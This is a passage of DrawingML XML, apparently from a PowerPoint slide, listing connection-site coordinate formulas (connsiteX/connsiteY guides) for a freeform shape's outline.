              <a:gd name="connsiteX113" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 270395 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 270395 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 62772 w 1349253"/>
